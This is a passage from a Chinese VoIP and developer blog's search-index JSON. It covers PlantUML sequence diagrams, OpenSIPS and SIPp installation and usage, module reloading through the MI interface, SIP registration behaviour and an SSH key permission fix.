-\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber\n@startuml autonumber alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml ","permalink":"https://wdd.js.org/posts/2019/09/hvscve/","summary":"我觉得PlantUML非常适合绘制时序图,先给个完整的例子,我经常会用到的PlantUML画SIP请求时序图。\n@startuml autonumber alice-\u0026gt;bob: INVITE bob-[#green]\u0026gt;alice: 180 Ringing bob-[#green]\u0026gt;alice: 200 OK == talking == bob-[#green]\u0026gt;alice: BYE alice-\u0026gt;bob: 200 OK @enduml 简单箭头 \u0026ndash;\u0026gt; 虚线箭头 -\u0026gt; 简单箭头 -[#red]\u0026gt; 带颜色的箭头 @startuml alice-\u0026gt;bob: INVITE bob--\u0026gt;alice: 180 Ringing @enduml 声明参与者顺序 先使用participant关键字声明了bob, 那么bob就会出现在最左边\n@startuml participant bob participant alice alice-\u0026gt;bob: INVITE bob-\u0026gt;alice: 180 Ringing @enduml 声明参与者类型 actor boundary control entity database @startuml participant start actor a boundary b control c entity d database e start-\u0026gt;a start-\u0026gt;b start-\u0026gt;c start-\u0026gt;d start-\u0026gt;e @enduml 箭头颜色 -[#red]\u0026gt; -[#0000ff]-\u0026gt; @startuml Bob -[#red]\u0026gt; Alice : hello Alice -[#0000FF]-\u0026gt;Bob : ok @enduml 箭头样式 @startuml Bob -\u0026gt;x Alice Bob -\u0026gt; Alice Bob -\u0026gt;\u0026gt; Alice Bob -\\ Alice Bob \\\\- Alice Bob //-- Alice Bob -\u0026gt;o Alice Bob o\\\\-- Alice Bob \u0026lt;-\u0026gt; Alice Bob \u0026lt;-\u0026gt;o Alice @enduml 箭头自动编号 设置autonumber","title":"PlantUML教程 包学包会"},{"content":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/centos-install/","summary":"安装依赖 yum update \u0026amp;\u0026amp; yum install epel-release yum install openssl-devel mariadb-devel libmicrohttpd-devel \\ libcurl-devel libconfuse-devel ncurses-devel 编译 下面的脚本,默认将opensips安装在/usr/local/etc/目录下\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; 如果想要指定安装位置,可以使用prefix参数指定,例如指定安装在/usr/aaa目录\n\u0026gt; cd opensips-2.4.6 # 编译 \u0026gt; make all -j4 prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; # 安装 \u0026gt; make install prefix=/usr/aaa include_modules=\u0026#34;db_mysql httpd db_http regex rest_client carrierroute dialplan\u0026#34; ","title":"centos7 安装opensips"},{"content":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装以来 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp --with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. 附件 sipp-3.3.990.tar.gz\n使用默认场景 uas sipp -sn uas -i 192.168.2.101 -sn 表示使用默认场景文件 uas 作为sip服务器 uac 作为sip客户端 -i 设置本地ip给Contact头 demo场景 sipp模拟sip服务器,当收到invite之后,先返回100,然后返回183,然后返回500\n首先我们将sipp内置的uas场景文件拿出来,基于这个场景文件做修改\n生成配置文件 sipp -sd uas \u0026gt; uas.xml 编辑配置文件\n启动uas\nsipp -sf uas.xml -i 192.168.40.77 -p 18627 -bg -skip_rlimit 帮助文档 Usage: sipp remote_host[:remote_port] [options] Available options: -v : Display version and copyright information. -aa : Enable automatic 200 OK answer for INFO, UPDATE and NOTIFY messages. -auth_uri : Force the value of the URI for authentication. By default, the URI is composed of remote_ip:remote_port. -au : Set authorization username for authentication challenges. Default is taken from -s argument -ap : Set the password for authentication challenges. Default is \u0026#39;password\u0026#39; -base_cseq : Start value of [cseq] for each call. -bg : Launch SIPp in background mode. -bind_local : Bind socket to local IP address, i.e. the local IP address is used as the source IP address. If SIPp runs in server mode it will only listen on the local IP address instead of all IP addresses. -buff_size : Set the send and receive buffer size. -calldebug_file : Set the name of the call debug file. -calldebug_overwrite: Overwrite the call debug file (default true). -cid_str : Call ID string (default %u-%p@%s). %u=call_number, %s=ip_address, %p=process_number, %%=% (in any order). -ci : Set the local control IP address -cp : Set the local control port number. Default is 8888. -d : Controls the length of calls. More precisely, this controls the duration of \u0026#39;pause\u0026#39; instructions in the scenario, if they do not have a \u0026#39;milliseconds\u0026#39; section. Default value is 0 and default unit is milliseconds. -deadcall_wait : How long the Call-ID and final status of calls should be kept to improve message and error logs (default unit is ms). -default_behaviors: Set the default behaviors that SIPp will use. Possbile values are: - all\tUse all default behaviors - none\tUse no default behaviors - bye\tSend byes for aborted calls - abortunexp\tAbort calls on unexpected messages - pingreply\tReply to ping requests If a behavior is prefaced with a -, then it is turned off. Example: all,-bye -error_file : Set the name of the error log file. -error_overwrite : Overwrite the error log file (default true). -f : Set the statistics report frequency on screen. Default is 1 and default unit is seconds. -fd : Set the statistics dump log report frequency. Default is 60 and default unit is seconds. -i : Set the local IP address for \u0026#39;Contact:\u0026#39;,\u0026#39;Via:\u0026#39;, and \u0026#39;From:\u0026#39; headers. Default is primary host IP address. -inf : Inject values from an external CSV file during calls into the scenarios. First line of this file say whether the data is to be read in sequence (SEQUENTIAL), random (RANDOM), or user (USER) order. Each line corresponds to one call and has one or more \u0026#39;;\u0026#39; delimited data fields. Those fields can be referred as [field0], [field1], ... in the xml scenario file. Several CSV files can be used simultaneously (syntax: -inf f1.csv -inf f2.csv ...) -infindex : file field Create an index of file using field. For example -inf users.csv -infindex users.csv 0 creates an index on the first key. -ip_field : Set which field from the injection file contains the IP address from which the client will send its messages. If this option is omitted and the \u0026#39;-t ui\u0026#39; option is present, then field 0 is assumed. Use this option together with \u0026#39;-t ui\u0026#39; -l : Set the maximum number of simultaneous calls. Once this limit is reached, traffic is decreased until the number of open calls goes down. Default: (3 * call_duration (s) * rate). -log_file : Set the name of the log actions log file. -log_overwrite : Overwrite the log actions log file (default true). -lost : Set the number of packets to lose by default (scenario specifications override this value). -rtcheck : Select the retransmisison detection method: full (default) or loose. -m : Stop the test and exit when \u0026#39;calls\u0026#39; calls are processed -mi : Set the local media IP address (default: local primary host IP address) -master : 3pcc extended mode: indicates the master number -max_recv_loops : Set the maximum number of messages received read per cycle. Increase this value for high traffic level. The default value is 1000. -max_sched_loops : Set the maximum number of calsl run per event loop. Increase this value for high traffic level. The default value is 1000. -max_reconnect : Set the the maximum number of reconnection. -max_retrans : Maximum number of UDP retransmissions before call ends on timeout. Default is 5 for INVITE transactions and 7 for others. -max_invite_retrans: Maximum number of UDP retransmissions for invite transactions before call ends on timeout. -max_non_invite_retrans: Maximum number of UDP retransmissions for non-invite transactions before call ends on timeout. -max_log_size : What is the limit for error and message log file sizes. -max_socket : Set the max number of sockets to open simultaneously. This option is significant if you use one socket per call. Once this limit is reached, traffic is distributed over the sockets already opened. Default value is 50000 -mb : Set the RTP echo buffer size (default: 2048). -message_file : Set the name of the message log file. -message_overwrite: Overwrite the message log file (default true). -mp : Set the local RTP echo port number. Default is 6000. -nd : No Default. Disable all default behavior of SIPp which are the following: - On UDP retransmission timeout, abort the call by sending a BYE or a CANCEL - On receive timeout with no ontimeout attribute, abort the call by sending a BYE or a CANCEL - On unexpected BYE send a 200 OK and close the call - On unexpected CANCEL send a 200 OK and close the call - On unexpected PING send a 200 OK and continue the call - On any other unexpected message, abort the call by sending a BYE or a CANCEL -nr : Disable retransmission in UDP mode. -nostdin : Disable stdin. -p : Set the local port number. Default is a random free port chosen by the system. -pause_msg_ign : Ignore the messages received during a pause defined in the scenario -periodic_rtd : Reset response time partition counters each logging interval. -plugin : Load a plugin. -r : Set the call rate (in calls per seconds). This value can bechanged during test by pressing \u0026#39;+\u0026#39;,\u0026#39;_\u0026#39;,\u0026#39;*\u0026#39; or \u0026#39;/\u0026#39;. Default is 10. pressing \u0026#39;+\u0026#39; key to increase call rate by 1 * rate_scale, pressing \u0026#39;-\u0026#39; key to decrease call rate by 1 * rate_scale, pressing \u0026#39;*\u0026#39; key to increase call rate by 10 * rate_scale, pressing \u0026#39;/\u0026#39; key to decrease call rate by 10 * rate_scale. If the -rp option is used, the call rate is calculated with the period in ms given by the user. -rp : Specify the rate period for the call rate. Default is 1 second and default unit is milliseconds. This allows you to have n calls every m milliseconds (by using -r n -rp m). Example: -r 7 -rp 2000 ==\u0026gt; 7 calls every 2 seconds. -r 10 -rp 5s =\u0026gt; 10 calls every 5 seconds. -rate_scale : Control the units for the \u0026#39;+\u0026#39;, \u0026#39;-\u0026#39;, \u0026#39;*\u0026#39;, and \u0026#39;/\u0026#39; keys. -rate_increase : Specify the rate increase every -fd units (default is seconds). This allows you to increase the load for each independent logging period. Example: -rate_increase 10 -fd 10s ==\u0026gt; increase calls by 10 every 10 seconds. -rate_max : If -rate_increase is set, then quit after the rate reaches this value. Example: -rate_increase 10 -rate_max 100 ==\u0026gt; increase calls by 10 until 100 cps is hit. -no_rate_quit : If -rate_increase is set, do not quit after the rate reaches -rate_max. -recv_timeout : Global receive timeout. Default unit is milliseconds. If the expected message is not received, the call times out and is aborted. -send_timeout : Global send timeout. Default unit is milliseconds. If a message is not sent (due to congestion), the call times out and is aborted. -sleep : How long to sleep for at startup. Default unit is seconds. -reconnect_close : Should calls be closed on reconnect? -reconnect_sleep : How long (in milliseconds) to sleep between the close and reconnect? -ringbuffer_files: How many error/message files should be kept after rotation? -ringbuffer_size : How large should error/message files be before they get rotated? -rsa : Set the remote sending address to host:port for sending the messages. -rtp_echo : Enable RTP echo. RTP/UDP packets received on port defined by -mp are echoed to their sender. RTP/UDP packets coming on this port + 2 are also echoed to their sender (used for sound and video echo). -rtt_freq : freq is mandatory. Dump response times every freq calls in the log file defined by -trace_rtt. Default value is 200. -s : Set the username part of the resquest URI. Default is \u0026#39;service\u0026#39;. -sd : Dumps a default scenario (embeded in the sipp executable) -sf : Loads an alternate xml scenario file. To learn more about XML scenario syntax, use the -sd option to dump embedded scenarios. They contain all the necessary help. -shortmessage_file: Set the name of the short message log file. -shortmessage_overwrite: Overwrite the short message log file (default true). -oocsf : Load out-of-call scenario. -oocsn : Load out-of-call scenario. -skip_rlimit : Do not perform rlimit tuning of file descriptor limits. Default: false. -slave : 3pcc extended mode: indicates the slave number -slave_cfg : 3pcc extended mode: indicates the file where the master and slave addresses are stored -sn : Use a default scenario (embedded in the sipp executable). If this option is omitted, the Standard SipStone UAC scenario is loaded. Available values in this version: - \u0026#39;uac\u0026#39; : Standard SipStone UAC (default). - \u0026#39;uas\u0026#39; : Simple UAS responder. - \u0026#39;regexp\u0026#39; : Standard SipStone UAC - with regexp and variables. - \u0026#39;branchc\u0026#39; : Branching and conditional branching in scenarios - client. - \u0026#39;branchs\u0026#39; : Branching and conditional branching in scenarios - server. Default 3pcc scenarios (see -3pcc option): - \u0026#39;3pcc-C-A\u0026#39; : Controller A side (must be started after all other 3pcc scenarios) - \u0026#39;3pcc-C-B\u0026#39; : Controller B side. - \u0026#39;3pcc-A\u0026#39; : A side. - \u0026#39;3pcc-B\u0026#39; : B side. -stat_delimiter : Set the delimiter for the statistics file -stf : Set the file name to use to dump statistics -t : Set the transport mode: - u1: UDP with one socket (default), - un: UDP with one socket per call, - ui: UDP with one socket per IP address The IP addresses must be defined in the injection file. - t1: TCP with one socket, - tn: TCP with one socket per call, - l1: TLS with one socket, - ln: TLS with one socket per call, - s1: SCTP with one socket (default), - sn: SCTP with one socket per call, - c1: u1 + compression (only if compression plugin loaded), - cn: un + compression (only if compression plugin loaded). This plugin is not provided with sipp. -timeout : Global timeout. Default unit is seconds. If this option is set, SIPp quits after nb units (-timeout 20s quits after 20 seconds). -timeout_error : SIPp fails if the global timeout is reached is set (-timeout option required). -timer_resol : Set the timer resolution. Default unit is milliseconds. This option has an impact on timers precision.Small values allow more precise scheduling but impacts CPU usage.If the compression is on, the value is set to 50ms. The default value is 10ms. -T2 : Global T2-timer in milli seconds -sendbuffer_warn : Produce warnings instead of errors on SendBuffer failures. -trace_msg : Displays sent and received SIP messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_messages.log -trace_shortmsg : Displays sent and received SIP messages as CSV in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_shortmessages.log -trace_screen : Dump statistic screens in the \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file when quitting SIPp. Useful to get a final status report in background mode (-bg option). -trace_err : Trace all unexpected messages in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_errors.log. -trace_calldebug : Dumps debugging information about aborted calls to \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_calldebug.log file. -trace_stat : Dumps all statistics in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;.csv file. Use the \u0026#39;-h stat\u0026#39; option for a detailed description of the statistics file content. -trace_counts : Dumps individual message counts in a CSV file. -trace_rtt : Allow tracing of all response times in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_rtt.csv. -trace_logs : Allow tracing of \u0026lt;log\u0026gt; actions in \u0026lt;scenario file name\u0026gt;_\u0026lt;pid\u0026gt;_logs.log. -users : Instead of starting calls at a fixed rate, begin \u0026#39;users\u0026#39; calls at startup, and keep the number of calls constant. -watchdog_interval: Set gap between watchdog timer firings. Default is 400. -watchdog_reset : If the watchdog timer has not fired in more than this time period, then reset the max triggers counters. Default is 10 minutes. -watchdog_minor_threshold: If it has been longer than this period between watchdog executions count a minor trip. Default is 500. -watchdog_major_threshold: If it has been longer than this period between watchdog executions count a major trip. Default is 3000. -watchdog_major_maxtriggers: How many times the major watchdog timer can be tripped before the test is terminated. Default is 10. -watchdog_minor_maxtriggers: How many times the minor watchdog timer can be tripped before the test is terminated. Default is 120. -tls_cert : Set the name for TLS Certificate file. Default is \u0026#39;cacert.pem -tls_key : Set the name for TLS Private Key file. Default is \u0026#39;cakey.pem\u0026#39; -tls_crl : Set the name for Certificate Revocation List file. If not specified, X509 CRL is not activated. -3pcc : Launch the tool in 3pcc mode (\u0026#34;Third Party call control\u0026#34;). The passed ip address is depending on the 3PCC role. - When the first twin command is \u0026#39;sendCmd\u0026#39; then this is the address of the remote twin socket. SIPp will try to connect to this address:port to send the twin command (This instance must be started after all other 3PCC scenarii). Example: 3PCC-C-A scenario. - When the first twin command is \u0026#39;recvCmd\u0026#39; then this is the address of the local twin socket. SIPp will open this address:port to listen for twin command. Example: 3PCC-C-B scenario. -tdmmap : Generate and handle a table of TDM circuits. A circuit must be available for the call to be placed. Format: -tdmmap {0-3}{99}{5-8}{1-31} -key : keyword value Set the generic parameter named \u0026#34;keyword\u0026#34; to \u0026#34;value\u0026#34;. -set : variable value Set the global variable parameter named \u0026#34;variable\u0026#34; to \u0026#34;value\u0026#34;. -multihome : Set multihome address for SCTP -heartbeat : Set heartbeat interval in ms for SCTP -assocmaxret : Set association max retransmit counter for SCTP -pathmaxret : Set path max retransmit counter for SCTP -pmtu : Set path MTU for SCTP -gracefulclose : If true, SCTP association will be closed with SHUTDOWN (default). If false, SCTP association will be closed by ABORT. -dynamicStart : variable value Set the start offset of dynamic_id varaiable -dynamicMax : variable value Set the maximum of dynamic_id variable -dynamicStep : variable value Set the increment of dynamic_id variable Signal handling: SIPp can be controlled using posix signals. The following signals are handled: USR1: Similar to press \u0026#39;q\u0026#39; keyboard key. It triggers a soft exit of SIPp. No more new calls are placed and all ongoing calls are finished before SIPp exits. Example: kill -SIGUSR1 732 USR2: Triggers a dump of all statistics screens in \u0026lt;scenario_name\u0026gt;_\u0026lt;pid\u0026gt;_screens.log file. Especially useful in background mode to know what the current status is. Example: kill -SIGUSR2 732 Exit code: Upon exit (on fatal error or when the number of asked calls (-m option) is reached, sipp exits with one of the following exit code: 0: All calls were successful 1: At least one call failed 97: exit on internal command. Calls may have been processed 99: Normal exit without calls processed -1: Fatal error -2: Fatal error binding a socket Example: Run sipp with embedded server (uas) scenario: ./sipp -sn uas On the same host, run sipp with embedded client (uac) scenario ./sipp -sn uac 127.0.0.1 参考 http://sipp.sourceforge.net/doc/reference.html http://sipp.sourceforge.net/doc3.3/reference.html 实战脚本学习 下面的两个链接里面有很多的真实场景测试的xml文件,可以用来深入学习\nhttps://github.com/pbertera/SIPp-by-example https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=pl 中文教程 sippZhong Wen Jiao Cheng - Knight.pdf 黄龙舟翻译 ","permalink":"https://wdd.js.org/opensips/tools/sipp/","summary":"安装 SIPp 3.3 # 解压 tar -zxvf sipp-3.3.990.tar.gz # centos 安装依赖 yum install lksctp-tools-devel libpcap-devel gcc-c++ gcc -y # ubuntu 安装以来 apt-get install -y pkg-config dh-autoreconf ncurses-dev build-essential libssl-dev libpcap-dev libncurses5-dev libsctp-dev lksctp-tools ./configure --with-sctp --with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.","title":"SIPp:sip压测模拟ua工具"},{"content":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在在xxx.cfg的地189哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。\n","permalink":"https://wdd.js.org/posts/2019/09/myy94p/","summary":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在在xxx.cfg的地189哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。","title":"编译器和女朋友有什么相同之处"},{"content":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","permalink":"https://wdd.js.org/opensips/ch5/homer6/","summary":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","title":"opensips 集成 homer6"},{"content":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到数据库,状态变化时,再回写到数据库。有一下模块列表:\ndispather load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处时不用每次都查数据库,运行速度会大大提升。\n以dispather为例子,opensips在启动时会从数据库总加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes连接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下回返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","permalink":"https://wdd.js.org/opensips/ch3/cache-reload/","summary":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到数据库,状态变化时,再回写到数据库。有一下模块列表:\ndispather load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处时不用每次都查数据库,运行速度会大大提升。\n以dispather为例子,opensips在启动时会从数据库总加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes连接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下回返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","title":"模块缓存策略与reload方法"},{"content":" sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端的在115秒注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变,一旦改变了。如果服务端的记录还没有失效,新的注册就会失败。\n有的客户会经常反馈,他们的分机总是无辜掉线。经过抓包分析,发现分机每隔1.5分钟注册一次,使用tcp注册的,每次的端口号都会变成不同的值。\n然后尝试让分机用udp注册,分机就不再异常掉线了。\n一个tcp socket一旦关闭,新的tcp socket必然会被分配不同的端口。但是udp不一样,udp是无连接的。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-register/","summary":"sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端的在115秒注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变,一旦改变了。如果服务端的记录还没有失效,新的注册就会失败。","title":"SIP注册调研"},{"content":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","permalink":"https://wdd.js.org/posts/2019/08/vhovcg/","summary":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too 